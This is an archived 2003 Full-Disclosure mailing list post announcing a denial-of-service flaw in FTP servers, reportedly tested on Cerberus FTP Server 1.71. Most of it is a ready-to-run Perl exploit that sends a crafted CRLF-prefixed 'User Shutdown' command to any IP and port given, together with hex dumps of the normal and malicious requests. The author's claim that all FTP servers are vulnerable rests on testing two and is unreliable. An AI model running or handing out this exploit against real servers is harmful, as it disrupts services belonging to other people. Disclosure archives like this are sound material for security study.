lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <00d301c36589$63f93ff0$0200000a@remote> From: florianrock at web.de (Florian Rock) Subject: FTPServer Denial Of Service Vulnerability I have found a very serious hole in FTPServer The Exploit is tested on Cerberus FTP Server 1.71 and a own coded, but I think all FTPServer are Vulnerable Sorry but i have to less ftpserver to test And so it Works Typical request: 00000000 55 73 65 72 20 53 68 75 74 64 6f 77 6e 0d 0a User Shutdown.. Exploit request: 00000000 0d 0a 55 73 65 72 20 53 68 75 74 64 6f 77 6e ..User Shutdown I've coded an exploit: See attached file: ftpcrash.exe (ziped) for people how have no perl My exploit (in perl): [code] -ftpcrash.pl- print "Exploit for FTP-Server\n"; print " by The real Remoter\n"; my $usage = "\nftpcrash <IP> <Port>\n"; die "$usage" unless $ARGV[0] && $ARGV[1]; use Socket; my $remote = $ARGV[0]; my $port = $ARGV[1]; my $iaddr = inet_aton($remote); my $proto = getprotobyname("tcp"); my $paddr = sockaddr_in($port, $iaddr); socket(SOCK, PF_INET, SOCK_STREAM, $proto); connect(SOCK, $paddr) or die "Can't connect to " . $remote; print "Sending exploit\n"; $msg = "\x0d\x0a"; $msg = $msg . "User Shutdown"; send(SOCK,$msg, 0) or die "Can't send Exploit"; sleep(1); print "Server Crashed!"; sleep(1); exit; [/code] Sorry for my bad english (I'm german) -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030818/93936a4b/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: ftpcrash.zip Type: application/octet-stream Size: 388061 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030818/93936a4b/ftpcrash.obj
Powered by blists - more mailing lists